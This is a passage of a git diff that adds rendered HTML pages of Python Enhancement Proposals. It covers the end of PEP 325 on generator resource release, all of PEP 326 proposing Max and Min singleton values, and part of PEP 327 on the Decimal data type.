If close is invoked with the generator suspended after the yield, +the except clause would catch our special purpose exception, so we +would get a different exception propagated back, which in this +case ought to be reasonably consumed and ignored but in general +should be propagated, but separating these scenarios seems hard.

+

The exception approach has the advantage to let the generator +distinguish between termination cases and have more control. On +the other hand, clear-cut semantics seem harder to define.

+
+
+

Remarks

+

If this proposal is accepted, it should become common practice to +document whether a generator acquires resources, so that its close +method ought to be called. If a generator is no longer used, +calling close should be harmless.

+

On the other hand, in the typical scenario the code that +instantiated the generator should call close if required by it. +Generic code dealing with iterators/generators instantiated +elsewhere should typically not be littered with close calls.

+

The rare case of code that has acquired ownership of and need to +properly deal with all of iterators, generators and generators +acquiring resources that need timely release, is easily solved:

+
if hasattr(iterator, 'close'):
+    iterator.close()
+
+
+
+
+

Open Issues

+

Definitive semantics ought to be chosen. Currently Guido favors +Exception Semantics. If the generator yields a value instead of +terminating, or propagating back the special exception, a special +exception should be raised again on the generator side.

+

It is still unclear whether spuriously converted special +exceptions (as discussed in Possible Semantics) are a problem and +what to do about them.

+

Implementation issues should be explored.

+
+
+

Alternative Ideas

+

The idea that the yield placement limitation should be removed and +that generator destruction should trigger execution of finally +clauses has been proposed more than once. Alone it cannot +guarantee that timely release of resources acquired by a generator +can be enforced.

+

PEP 288 proposes a more general solution, allowing custom +exception passing to generators. The proposal in this PEP +addresses more directly the problem of resource release. Were +PEP 288 implemented, Exceptions Semantics for close could be layered +on top of it, on the other hand PEP 288 should make a separate +case for the more general functionality.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0325.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0326/index.html b/pep-0326/index.html new file mode 100644 index 00000000000..8b8203c888c --- /dev/null +++ b/pep-0326/index.html @@ -0,0 +1,613 @@ + + + + + + + + PEP 326 – A Case for Top and Bottom Values | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 326 – A Case for Top and Bottom Values

+
+
Author:
+
Josiah Carlson <jcarlson at uci.edu>, +Terry Reedy <tjreedy at udel.edu>
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
20-Dec-2003
+
Python-Version:
+
2.4
+
Post-History:
+
20-Dec-2003, 03-Jan-2004, 05-Jan-2004, 07-Jan-2004, +21-Feb-2004
+
+
+
+
Table of Contents +
+
+

Results

+

This PEP has been rejected by the BDFL [8]. As per the +pseudo-sunset clause [9], PEP 326 is being updated one last time +with the latest suggestions, code modifications, etc., and includes a +link to a module [10] that implements the behavior described in the +PEP. Users who desire the behavior listed in this PEP are encouraged +to use the module for the reasons listed in +Independent Implementations?.

+
+
+

Abstract

+

This PEP proposes two singleton constants that represent a top and +bottom [3] value: Max and Min (or two similarly suggestive +names [4]; see Open Issues).

+

As suggested by their names, Max and Min would compare higher +or lower than any other object (respectively). Such behavior results +in easier to understand code and fewer special cases in which a +temporary minimum or maximum value is required, and an actual minimum +or maximum numeric value is not limited.

+
+
+

Rationale

+

While None can be used as an absolute minimum that any value can +attain [1], this may be deprecated [4] in Python 3.0 and shouldn’t +be relied upon.

+

As a replacement for None being used as an absolute minimum, as +well as the introduction of an absolute maximum, the introduction of +two singleton constants Max and Min address concerns for the +constants to be self-documenting.

+

What is commonly done to deal with absolute minimum or maximum values, +is to set a value that is larger than the script author ever expects +the input to reach, and hope that it isn’t reached.

+

Guido has brought up [2] the fact that there exists two constants +that can be used in the interim for maximum values: sys.maxint and +floating point positive infinity (1e309 will evaluate to positive +infinity). However, each has their drawbacks.

+
    +
  • On most architectures sys.maxint is arbitrarily small (2**31-1 or +2**63-1) and can be easily eclipsed by large ‘long’ integers or +floating point numbers.
  • +
  • Comparing long integers larger than the largest floating point +number representable against any float will result in an exception +being raised:
    >>> cmp(1.0, 10**309)
    +Traceback (most recent call last):
    +File "<stdin>", line 1, in ?
    +OverflowError: long int too large to convert to float
    +
    +
    +

    Even when large integers are compared against positive infinity:

    +
    >>> cmp(1e309, 10**309)
    +Traceback (most recent call last):
    +File "<stdin>", line 1, in ?
    +OverflowError: long int too large to convert to float
    +
    +
    +
  • +
  • These same drawbacks exist when numbers are negative.
  • +
+

Introducing Max and Min that work as described above does not +take much effort. A sample Python reference implementation of both +is included.

+
+
+

Motivation

+

There are hundreds of algorithms that begin by initializing some set +of values to a logical (or numeric) infinity or negative infinity. +Python lacks either infinity that works consistently or really is the +most extreme value that can be attained. By adding Max and +Min, Python would have a real maximum and minimum value, and such +algorithms can become clearer due to the reduction of special cases.

+
+

Max Examples

+

When testing various kinds of servers, it is sometimes necessary to +only serve a certain number of clients before exiting, which results +in code like the following:

+
count = 5
+
+def counts(stop):
+    i = 0
+    while i < stop:
+        yield i
+        i += 1
+
+for client_number in counts(count):
+    handle_one_client()
+
+
+

When using Max as the value assigned to count, our testing server +becomes a production server with minimal effort.

+

As another example, in Dijkstra’s shortest path algorithm on a graph +with weighted edges (all positive).

+
    +
  1. Set distances to every node in the graph to infinity.
  2. +
  3. Set the distance to the start node to zero.
  4. +
  5. Set visited to be an empty mapping.
  6. +
  7. While shortest distance of a node that has not been visited is less +than infinity and the destination has not been visited.
      +
    1. Get the node with the shortest distance.
    2. +
    3. Visit the node.
    4. +
    5. Update neighbor distances and parent pointers if necessary for +neighbors that have not been visited.
    6. +
    +
  8. +
  9. If the destination has been visited, step back through parent +pointers to find the reverse of the path to be taken.
  10. +
+

Below is an example of Dijkstra’s shortest path algorithm on a graph +with weighted edges using a table (a faster version that uses a heap +is available, but this version is offered due to its similarity to the +description above, the heap version is available via older versions of +this document).

+
def DijkstraSP_table(graph, S, T):
+    table = {}                                                 #3
+    for node in graph.iterkeys():
+        #(visited, distance, node, parent)
+        table[node] = (0, Max, node, None)                     #1
+    table[S] = (0, 0, S, None)                                 #2
+    cur = min(table.values())                                  #4a
+    while (not cur[0]) and cur[1] < Max:                       #4
+        (visited, distance, node, parent) = cur
+        table[node] = (1, distance, node, parent)              #4b
+        for cdist, child in graph[node]:                       #4c
+            ndist = distance+cdist                             #|
+            if not table[child][0] and ndist < table[child][1]:#|
+                table[child] = (0, ndist, child, node)         #|_
+        cur = min(table.values())                              #4a
+    if not table[T][0]:
+        return None
+    cur = T                                                    #5
+    path = [T]                                                 #|
+    while table[cur][3] is not None:                           #|
+        path.append(table[cur][3])                             #|
+        cur = path[-1]                                         #|
+    path.reverse()                                             #|
+    return path                                                #|_
+
+
+

Readers should note that replacing Max in the above code with an +arbitrarily large number does not guarantee that the shortest path +distance to a node will never exceed that number. Well, with one +caveat: one could certainly sum up the weights of every edge in the +graph, and set the ‘arbitrarily large number’ to that total. However, +doing so does not make the algorithm any easier to understand and has +potential problems with numeric overflows.

+

Gustavo Niemeyer [7] points out that using a more Pythonic data +structure than tuples, to store information about node distances, +increases readability. Two equivalent node structures (one using +None, the other using Max) and their use in a suitably +modified Dijkstra’s shortest path algorithm is given below.

+
class SuperNode:
+    def __init__(self, node, parent, distance, visited):
+        self.node = node
+        self.parent = parent
+        self.distance = distance
+        self.visited = visited
+
+class MaxNode(SuperNode):
+    def __init__(self, node, parent=None, distance=Max,
+                 visited=False):
+        SuperNode.__init__(self, node, parent, distance, visited)
+    def __cmp__(self, other):
+        return cmp((self.visited, self.distance),
+                   (other.visited, other.distance))
+
+class NoneNode(SuperNode):
+    def __init__(self, node, parent=None, distance=None,
+                 visited=False):
+        SuperNode.__init__(self, node, parent, distance, visited)
+    def __cmp__(self, other):
+        pair = ((self.visited, self.distance),
+                (other.visited, other.distance))
+        if None in (self.distance, other.distance):
+            return -cmp(*pair)
+        return cmp(*pair)
+
+def DijkstraSP_table_node(graph, S, T, Node):
+    table = {}                                                 #3
+    for node in graph.iterkeys():
+        table[node] = Node(node)                               #1
+    table[S] = Node(S, distance=0)                             #2
+    cur = min(table.values())                                  #4a
+    sentinel = Node(None).distance
+    while not cur.visited and cur.distance != sentinel:        #4
+        cur.visited = True                                     #4b
+        for cdist, child in graph[node]:                       #4c
+            ndist = distance+cdist                             #|
+            if not table[child].visited and\                   #|
+               ndist < table[child].distance:                  #|
+                table[child].distance = ndist                  #|_
+        cur = min(table.values())                              #4a
+    if not table[T].visited:
+        return None
+    cur = T                                                    #5
+    path = [T]                                                 #|
+    while table[cur].parent is not None:                       #|
+        path.append(table[cur].parent)                         #|
+        cur = path[-1]                                         #|
+    path.reverse()                                             #|
+    return path                                                #|_
+
+
+

In the above, passing in either NoneNode or MaxNode would be +sufficient to use either None or Max for the node distance +‘infinity’. Note the additional special case required for None +being used as a sentinel in NoneNode in the __cmp__ method.

+

This example highlights the special case handling where None is +used as a sentinel value for maximum values “in the wild”, even though +None itself compares smaller than any other object in the standard +distribution.

+

As an aside, it is not clear to the author that using Nodes as a +replacement for tuples has increased readability significantly, if at +all.

+
+
+

A Min Example

+

An example of usage for Min is an algorithm that solves the +following problem [5]:

+
+
Suppose you are given a directed graph, representing a +communication network. The vertices are the nodes in the network, +and each edge is a communication channel. Each edge (u, v) has +an associated value r(u, v), with 0 <= r(u, v) <= 1, which +represents the reliability of the channel from u to v +(i.e., the probability that the channel from u to v will +not fail). Assume that the reliability probabilities of the +channels are independent. (This implies that the reliability of +any path is the product of the reliability of the edges along the +path.) Now suppose you are given two nodes in the graph, A +and B.
+

Such an algorithm is a 7 line modification to the DijkstraSP_table +algorithm given above (modified lines prefixed with *):

+
def DijkstraSP_table(graph, S, T):
+    table = {}                                                 #3
+    for node in graph.iterkeys():
+        #(visited, distance, node, parent)
+*       table[node] = (0, Min, node, None)                     #1
+*   table[S] = (0, 1, S, None)                                 #2
+*   cur = max(table.values())                                  #4a
+*   while (not cur[0]) and cur[1] > Min:                       #4
+        (visited, distance, node, parent) = cur
+        table[node] = (1, distance, node, parent)              #4b
+        for cdist, child in graph[node]:                       #4c
+*           ndist = distance*cdist                             #|
+*           if not table[child][0] and ndist > table[child][1]:#|
+                table[child] = (0, ndist, child, node)         #|_
+*       cur = max(table.values())                              #4a
+    if not table[T][0]:
+        return None
+    cur = T                                                    #5
+    path = [T]                                                 #|
+    while table[cur][3] is not None:                           #|
+        path.append(table[cur][3])                             #|
+        cur = path[-1]                                         #|
+    path.reverse()                                             #|
+    return path                                                #|_
+
+
+

Note that there is a way of translating the graph to so that it can be +passed unchanged into the original DijkstraSP_table algorithm. +There also exists a handful of easy methods for constructing Node +objects that would work with DijkstraSP_table_node. Such +translations are left as an exercise to the reader.

+
+
+

Other Examples

+

Andrew P. Lentvorski, Jr. [6] has pointed out that various data +structures involving range searching have immediate use for Max +and Min values. More specifically; Segment trees, Range trees, +k-d trees and database keys:

+
+
…The issue is that a range can be open on one side and does not +always have an initialized case.

The solutions I have seen are to either overload None as the +extremum or use an arbitrary large magnitude number. Overloading +None means that the built-ins can’t really be used without special +case checks to work around the undefined (or “wrongly defined”) +ordering of None. These checks tend to swamp the nice performance +of built-ins like max() and min().

+

Choosing a large magnitude number throws away the ability of +Python to cope with arbitrarily large integers and introduces a +potential source of overrun/underrun bugs.

+
+

Further use examples of both Max and Min are available in the +realm of graph algorithms, range searching algorithms, computational +geometry algorithms, and others.

+
+
+

Independent Implementations?

+

Independent implementations of the Min/Max concept by users +desiring such functionality are not likely to be compatible, and +certainly will produce inconsistent orderings. The following examples +seek to show how inconsistent they can be.

+
    +
  • Let us pretend we have created proper separate implementations of +MyMax, MyMin, YourMax and YourMin with the same code as given in +the sample implementation (with some minor renaming):
    >>> lst = [YourMin, MyMin, MyMin, YourMin, MyMax, YourMin, MyMax,
    +YourMax, MyMax]
    +>>> lst.sort()
    +>>> lst
    +[YourMin, YourMin, MyMin, MyMin, YourMin, MyMax, MyMax, YourMax,
    +MyMax]
    +
    +
    +

    Notice that while all the “Min”s are before the “Max”s, there is no +guarantee that all instances of YourMin will come before MyMin, the +reverse, or the equivalent MyMax and YourMax.

    +
  • +
  • The problem is also evident when using the heapq module:
    >>> lst = [YourMin, MyMin, MyMin, YourMin, MyMax, YourMin, MyMax,
    +YourMax, MyMax]
    +>>> heapq.heapify(lst)  #not needed, but it can't hurt
    +>>> while lst: print heapq.heappop(lst),
    +...
    +YourMin MyMin YourMin YourMin MyMin MyMax MyMax YourMax MyMax
    +
    +
    +
  • +
  • Furthermore, the findmin_Max code and both versions of Dijkstra +could result in incorrect output by passing in secondary versions of +Max.
  • +
+

It has been pointed out [7] that the reference implementation given +below would be incompatible with independent implementations of +Max/Min. The point of this PEP is for the introduction of +“The One True Implementation” of “The One True Maximum” and “The One +True Minimum”. User-based implementations of Max and Min +objects would thusly be discouraged, and use of “The One True +Implementation” would obviously be encouraged. Ambiguous behavior +resulting from mixing users’ implementations of Max and Min +with “The One True Implementation” should be easy to discover through +variable and/or source code introspection.

+
+
+
+

Reference Implementation

+
class _ExtremeType(object):
+
+    def __init__(self, cmpr, rep):
+        object.__init__(self)
+        self._cmpr = cmpr
+        self._rep = rep
+
+    def __cmp__(self, other):
+        if isinstance(other, self.__class__) and\
+           other._cmpr == self._cmpr:
+            return 0
+        return self._cmpr
+
+    def __repr__(self):
+        return self._rep
+
+Max = _ExtremeType(1, "Max")
+Min = _ExtremeType(-1, "Min")
+
+
+

Results of Test Run:

+
>>> max(Max, 2**65536)
+Max
+>>> min(Max, 2**65536)
+20035299304068464649790...
+(lines removed for brevity)
+...72339445587895905719156736L
+>>> min(Min, -2**65536)
+Min
+>>> max(Min, -2**65536)
+-2003529930406846464979...
+(lines removed for brevity)
+...072339445587895905719156736L
+
+
+
+
+

Open Issues

+

As the PEP was rejected, all open issues are now closed and +inconsequential. The module will use the names UniversalMaximum +and UniversalMinimum due to the fact that it would be very +difficult to mistake what each does. For those who require a shorter +name, renaming the singletons during import is suggested:

+
from extremes import UniversalMaximum as uMax,
+                     UniversalMinimum as uMin
+
+
+
+
+

References

+ +
+
+

Changes

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0326.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0327/index.html b/pep-0327/index.html new file mode 100644 index 00000000000..a155d314cfe --- /dev/null +++ b/pep-0327/index.html @@ -0,0 +1,1360 @@ + + + + + + + + PEP 327 – Decimal Data Type | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 327 – Decimal Data Type

+
+
Author:
+
Facundo Batista <facundo at taniquetil.com.ar>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
17-Oct-2003
+
Python-Version:
+
2.4
+
Post-History:
+
30-Nov-2003, 02-Jan-2004, 29-Jan-2004
+
+
+
+
Table of Contents +
+
+

Abstract

+

The idea is to have a Decimal data type, for every use where decimals +are needed but binary floating point is too inexact.

+

The Decimal data type will support the Python standard functions and +operations, and must comply with the decimal arithmetic ANSI standard +X3.274-1996 [1].

+

Decimal will be floating point (as opposed to fixed point) and will +have bounded precision (the precision is the upper limit on the +number of significant digits in a result). However, precision is +user-settable, and a notion of significant trailing zeroes is supported +so that fixed-point usage is also possible.

+

This work is based on code and test functions written by Eric Price, +Aahz and Tim Peters. Just before Python 2.4a1, the decimal.py +reference implementation was moved into the standard library; along +with the documentation and the test suite, this was the work of +Raymond Hettinger. Much of the explanation in this PEP is taken from +Cowlishaw’s work [2], comp.lang.python and python-dev.

+
+
+

Motivation

+

Here I’ll expose the reasons of why I think a Decimal data type is +needed and why other numeric data types are not enough.

+

I wanted a Money data type, and after proposing a pre-PEP in +comp.lang.python, the community agreed to have a numeric data type +with the needed arithmetic behaviour, and then build Money over it: +all the considerations about quantity of digits after the decimal +point, rounding, etc., will be handled through Money. It is not the +purpose of this PEP to have a data type that can be used as Money +without further effort.

+

One of the biggest advantages of implementing a standard is that +someone already thought out all the creepy cases for you. And to a +standard GvR redirected me: Mike Cowlishaw’s General Decimal +Arithmetic specification [2]. This document defines a general +purpose decimal arithmetic. A correct implementation of this +specification will conform to the decimal arithmetic defined in +ANSI/IEEE standard 854-1987, except for some minor restrictions, and +will also provide unrounded decimal arithmetic and integer arithmetic +as proper subsets.

+
+

The problem with binary float

+

In decimal math, there are many numbers that can’t be represented with +a fixed number of decimal digits, e.g. 1/3 = 0.3333333333…….

+

In base 2 (the way that standard floating point is calculated), 1/2 = +0.1, 1/4 = 0.01, 1/8 = 0.001, etc. Decimal 0.2 equals 2/10 equals +1/5, resulting in the binary fractional number +0.001100110011001… As you can see, the problem is that some decimal +numbers can’t be represented exactly in binary, resulting in small +roundoff errors.

+

So we need a decimal data type that represents exactly decimal +numbers. Instead of a binary data type, we need a decimal one.

+
+
+

Why floating point?

+

So we go to decimal, but why floating point?

+

Floating point numbers use a fixed quantity of digits (precision) to +represent a number, working with an exponent when the number gets too +big or too small. For example, with a precision of 5:

+
  1234 ==>   1234e0
+ 12345 ==>  12345e0
+123456 ==>  12346e1
+
+
+

(note that in the last line the number got rounded to fit in five digits).

+

In contrast, we have the example of a long integer with infinite +precision, meaning that you can have the number as big as you want, +and you’ll never lose any information.

+

In a fixed point number, the position of the decimal point is fixed. +For a fixed point data type, check Tim Peter’s FixedPoint at +SourceForge [4]. I’ll go for floating point because it’s easier to +implement the arithmetic behaviour of the standard, and then you can +implement a fixed point data type over Decimal.

+

But why can’t we have a floating point number with infinite precision? +It’s not so easy, because of inexact divisions. E.g.: 1/3 = +0.3333333333333… ad infinitum. In this case you should store an +infinite amount of 3s, which takes too much memory, ;).

+

John Roth proposed to eliminate the division operator and force the +user to use an explicit method, just to avoid this kind of trouble. +This generated adverse reactions in comp.lang.python, as everybody +wants to have support for the / operator in a numeric data type.

+

With this exposed maybe you’re thinking “Hey! Can we just store the 1 +and the 3 as numerator and denominator?”, which takes us to the next +point.

+
+
+

Why not rational?

+

Rational numbers are stored using two integer numbers, the numerator +and the denominator. This implies that the arithmetic operations +can’t be executed directly (e.g. to add two rational numbers you first +need to calculate the common denominator).

+

Quoting Alex Martelli:

+
+
The performance implications of the fact that summing two +rationals (which take O(M) and O(N) space respectively) gives a +rational which takes O(M+N) memory space is just too troublesome. +There are excellent Rational implementations in both pure Python +and as extensions (e.g., gmpy), but they’ll always be a “niche +market” IMHO. Probably worth PEPping, not worth doing without +Decimal – which is the right way to represent sums of money, a +truly major use case in the real world.
+

Anyway, if you’re interested in this data type, you maybe will want to +take a look at PEP 239: Adding a Rational Type to Python.

+
+
+

So, what do we have?

+

The result is a Decimal data type, with bounded precision and floating +point.

+

Will it be useful? I can’t say it better than Alex Martelli:

+
+
Python (out of the box) doesn’t let you have binary floating point +numbers with whatever precision you specify: you’re limited to +what your hardware supplies. Decimal, be it used as a fixed or +floating point number, should suffer from no such limitation: +whatever bounded precision you may specify on number creation +(your memory permitting) should work just as well. Most of the +expense of programming simplicity can be hidden from application +programs and placed in a suitable decimal arithmetic type. As per +http://speleotrove.com/decimal/, a single data type can be +used for integer, fixed-point, and floating-point decimal +arithmetic – and for money arithmetic which doesn’t drive the +application programmer crazy.
+

There are several uses for such a data type. As I said before, I will +use it as base for Money. In this case the bounded precision is not +an issue; quoting Tim Peters:

+
+
A precision of 20 would be way more than enough to account for +total world economic output, down to the penny, since the +beginning of time.
+
+
+
+

General Decimal Arithmetic Specification

+

Here I’ll include information and descriptions that are part of the +specification [2] (the structure of the number, the context, etc.). +All the requirements included in this section are not for discussion +(barring typos or other mistakes), as they are in the standard, and +the PEP is just for implementing the standard.

+

Because of copyright restrictions, I can not copy here explanations +taken from the specification, so I’ll try to explain it in my own +words. I firmly encourage you to read the original specification +document [2] for details or if you have any doubt.

+
+

The Arithmetic Model

+

The specification is based on a decimal arithmetic model, as defined +by the relevant standards: IEEE 854 [3], ANSI X3-274 [1], and the +proposed revision [5] of IEEE 754 [6].

+

The model has three components:

+
    +
  • Numbers: just the values that the operation uses as input or output.
  • +
  • Operations: addition, multiplication, etc.
  • +
  • Context: a set of parameters and rules that the user can select and +which govern the results of operations (for example, the precision +to be used).
  • +
+
+
+

Numbers

+

Numbers may be finite or special values. The former can be +represented exactly. The latter are infinites and undefined (such as +0/0).

+

Finite numbers are defined by three parameters:

+
    +
  • Sign: 0 (positive) or 1 (negative).
  • +
  • Coefficient: a non-negative integer.
  • +
  • Exponent: a signed integer, the power of ten of the coefficient +multiplier.
  • +
+

The numerical value of a finite number is given by:

+
(-1)**sign * coefficient * 10**exponent
+
+
+

Special values are named as following:

+
    +
  • Infinity: a value which is infinitely large. Could be positive or +negative.
  • +
  • Quiet NaN (“qNaN”): represent undefined results (Not a Number). +Does not cause an Invalid operation condition. The sign in a NaN +has no meaning.
  • +
  • Signaling NaN (“sNaN”): also Not a Number, but will cause an +Invalid operation condition if used in any operation.
  • +
+
+
+

Context

+

The context is a set of parameters and rules that the user can select +and which govern the results of operations (for example, the precision +to be used).

+

The context gets that name because it surrounds the Decimal numbers, +with parts of context acting as input to, and output of, operations. +It’s up to the application to work with one or several contexts, +but definitely the idea is not to get a context per Decimal number. +For example, a typical use would be to set the context’s precision to +20 digits at the start of a program, and never explicitly use context +again.

+

These definitions don’t affect the internal storage of the Decimal +numbers, just the way that the arithmetic operations are performed.

+

The context is mainly defined by the following parameters (see +Context Attributes for all context attributes):

+
    +
  • Precision: The maximum number of significant digits that can result +from an arithmetic operation (integer > 0). There is no maximum for +this value.
  • +
  • Rounding: The name of the algorithm to be used when rounding is +necessary, one of “round-down”, “round-half-up”, “round-half-even”, +“round-ceiling”, “round-floor”, “round-half-down”, and “round-up”. +See Rounding Algorithms below.
  • +
  • Flags and trap-enablers: Exceptional conditions are grouped into +signals, controllable individually, each consisting of a flag +(boolean, set when the signal occurs) and a trap-enabler (a boolean +that controls behavior). The signals are: “clamped”, +“division-by-zero”, “inexact”, “invalid-operation”, “overflow”, +“rounded”, “subnormal” and “underflow”.
  • +
+
+
+

Default Contexts

+

The specification defines two default contexts, which should be easily +selectable by the user.

+

Basic Default Context:

+
    +
  • flags: all set to 0
  • +
  • trap-enablers: inexact, rounded, and subnormal are set to 0; all +others are set to 1
  • +
  • precision: is set to 9
  • +
  • rounding: is set to round-half-up
  • +
+

Extended Default Context:

+
    +
  • flags: all set to 0
  • +
  • trap-enablers: all set to 0
  • +
  • precision: is set to 9
  • +
  • rounding: is set to round-half-even
  • +
+
+
+

Exceptional Conditions

+

The table below lists the exceptional conditions that may arise during +the arithmetic operations, the corresponding signal, and the defined +result. For details, see the specification [2].

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
ConditionSignalResult
Clampedclampedsee spec [2]
Division by zerodivision-by-zero[sign,inf]
Inexactinexactunchanged
Invalid operationinvalid-operation[0,qNaN] (or [s,qNaN] or [s,qNaN,d] +when the cause is a signaling NaN)
Overflowoverflowdepends on the rounding mode
Roundedroundedunchanged
Subnormalsubnormalunchanged
Underflowunderflowsee spec [2]
+

Note: when the standard talks about “Insufficient storage”, as long as +this is implementation-specific behaviour about not having enough +storage to keep the internals of the number, this implementation will +raise MemoryError.

+

Regarding Overflow and Underflow, there’s been a long discussion in +python-dev about artificial limits. The general consensus is to keep +the artificial limits only if there are important reasons to do that. +Tim Peters gives us three:

+
+
…eliminating bounds on exponents effectively means overflow +(and underflow) can never happen. But overflow is a valuable +safety net in real life fp use, like a canary in a coal mine, +giving danger signs early when a program goes insane.

Virtually all implementations of 854 use (and as IBM’s standard +even suggests) “forbidden” exponent values to encode non-finite +numbers (infinities and NaNs). A bounded exponent can do this at +virtually no extra storage cost. If the exponent is unbounded, +then additional bits have to be used instead. This cost remains +hidden until more time- and space- efficient implementations are +attempted.

+

Big as it is, the IBM standard is a tiny start at supplying a +complete numeric facility. Having no bound on exponent size will +enormously complicate the implementations of, e.g., decimal sin() +and cos() (there’s then no a priori limit on how many digits of +pi effectively need to be known in order to perform argument +reduction).

+
+

Edward Loper give us an example of when the limits are to be crossed: +probabilities.

+

That said, Robert Brewer and Andrew Lentvorski want the limits to be +easily modifiable by the users. Actually, this is quite possible:

+
>>> d1 = Decimal("1e999999999")     # at the exponent limit
+>>> d1
+Decimal("1E+999999999")
+>>> d1 * 10                         # exceed the limit, got infinity
+Traceback (most recent call last):
+  File "<pyshell#3>", line 1, in ?
+    d1 * 10
+  ...
+  ...
+Overflow: above Emax
+>>> getcontext().Emax = 1000000000  # increase the limit
+>>> d1 * 10                         # does not exceed any more
+Decimal("1.0E+1000000000")
+>>> d1 * 100                        # exceed again
+Traceback (most recent call last):
+  File "<pyshell#3>", line 1, in ?
+    d1 * 100
+  ...
+  ...
+Overflow: above Emax
+
+
+
+
+

Rounding Algorithms

+

round-down: The discarded digits are ignored; the result is +unchanged (round toward 0, truncate):

+
1.123 --> 1.12
+1.128 --> 1.12
+1.125 --> 1.12
+1.135 --> 1.13
+
+
+

round-half-up: If the discarded digits represent greater than or +equal to half (0.5) then the result should be incremented by 1; +otherwise the discarded digits are ignored:

+
1.123 --> 1.12
+1.128 --> 1.13
+1.125 --> 1.13
+1.135 --> 1.14
+
+
+

round-half-even: If the discarded digits represent greater than +half (0.5) then the result coefficient is incremented by 1; if they +represent less than half, then the result is not adjusted; otherwise +the result is unaltered if its rightmost digit is even, or incremented +by 1 if its rightmost digit is odd (to make an even digit):

+
1.123 --> 1.12
+1.128 --> 1.13
+1.125 --> 1.12
+1.135 --> 1.14
+
+
+

round-ceiling: If all of the discarded digits are zero or if the +sign is negative the result is unchanged; otherwise, the result is +incremented by 1 (round toward positive infinity):

+
 1.123 -->  1.13
+ 1.128 -->  1.13
+-1.123 --> -1.12
+-1.128 --> -1.12
+
+
+

round-floor: If all of the discarded digits are zero or if the +sign is positive the result is unchanged; otherwise, the absolute +value of the result is incremented by 1 (round toward negative +infinity):

+
 1.123 -->  1.12
+ 1.128 -->  1.12
+-1.123 --> -1.13
+-1.128 --> -1.13
+
+
+

round-half-down: If the discarded digits represent greater than +half (0.5) then the result is incremented by 1; otherwise the +discarded digits are ignored:

+
1.123 --> 1.12
+1.128 --> 1.13
+1.125 --> 1.12
+1.135 --> 1.13
+
+
+

round-up: If all of the discarded digits are zero the result is +unchanged, otherwise the result is incremented by 1 (round away from +0):

+
1.123 --> 1.13
+1.128 --> 1.13
+1.125 --> 1.13
+1.135 --> 1.14
+
+
+
+
+
+

Rationale

+

I must separate the requirements in two sections. The first is to +comply with the ANSI standard. All the requirements for this are +specified in the Mike Cowlishaw’s work [2]. He also provided a +very large suite of test cases.

+

The second section of requirements (standard Python functions support, +usability, etc.) is detailed from here, where I’ll include all the +decisions made and why, and all the subjects still being discussed.

+
+

Explicit construction

+

The explicit construction does not get affected by the context (there +is no rounding, no limits by the precision, etc.), because the context +affects just operations’ results. The only exception to this is when +you’re Creating from Context.

+
+

From int or long

+

There’s no loss and no need to specify any other information:

+
Decimal(35)
+Decimal(-124)
+
+
+
+
+

From string

+

Strings containing Python decimal integer literals and Python float +literals will be supported. In this transformation there is no loss +of information, as the string is directly converted to Decimal (there +is not an intermediate conversion through float):

+
Decimal("-12")
+Decimal("23.2e-7")
+
+
+

Also, you can construct in this way all special values (Infinity and +Not a Number):

+
Decimal("Inf")
+Decimal("NaN")
+
+
+
+
+

From float

+

The initial discussion on this item was what should +happen when passing floating point to the constructor:

+
    +
  1. Decimal(1.1) == Decimal('1.1')
  2. +
  3. Decimal(1.1) == +Decimal('110000000000000008881784197001252...e-51')
  4. +
  5. an exception is raised
  6. +
+

Several people alleged that (1) is the better option here, because +it’s what you expect when writing Decimal(1.1). And quoting John +Roth, it’s easy to implement:

+
+
It’s not at all difficult to find where the actual number ends and +where the fuzz begins. You can do it visually, and the algorithms +to do it are quite well known.
+

But If I really want my number to be +Decimal('110000000000000008881784197001252...e-51'), why can’t I +write Decimal(1.1)? Why should I expect Decimal to be “rounding” +it? Remember that 1.1 is binary floating point, so I can +predict the result. It’s not intuitive to a beginner, but that’s the +way it is.

+

Anyway, Paul Moore showed that (1) can’t work, because:

+
(1) says  D(1.1) == D('1.1')
+but       1.1 == 1.1000000000000001
+so        D(1.1) == D(1.1000000000000001)
+together: D(1.1000000000000001) == D('1.1')
+
+
+

which is wrong, because if I write Decimal('1.1') it is exact, not +D(1.1000000000000001). He also proposed to have an explicit +conversion to float. bokr says you need to put the precision in the +constructor and mwilson agreed:

+
d = Decimal (1.1, 1)  # take float value to 1 decimal place
+d = Decimal (1.1)  # gets `places` from pre-set context
+
+
+

But Alex Martelli says that:

+
+
Constructing with some specified precision would be fine. Thus, +I think “construction from float with some default precision” runs +a substantial risk of tricking naive users.
+

So, the accepted solution through c.l.p is that you can not call Decimal +with a float. Instead you must use a method: Decimal.from_float(). The +syntax:

+
Decimal.from_float(floatNumber, [decimal_places])
+
+
+

where floatNumber is the float number origin of the construction +and decimal_places are the number of digits after the decimal +point where you apply a round-half-up rounding, if any. In this way +you can do, for example:

+
Decimal.from_float(1.1, 2): The same as doing Decimal('1.1').
+Decimal.from_float(1.1, 16): The same as doing Decimal('1.1000000000000001').
+Decimal.from_float(1.1): The same as doing Decimal('1100000000000000088817841970012523233890533447265625e-51').
+
+
+

Based on later discussions, it was decided to omit from_float() from the +API for Py2.4. Several ideas contributed to the thought process:

+
    +
  • Interactions between decimal and binary floating point force the user to +deal with tricky issues of representation and round-off. Avoidance of those +issues is a primary reason for having the module in the first place.
  • +
  • The first release of the module should focus on that which is safe, minimal, +and essential.
  • +
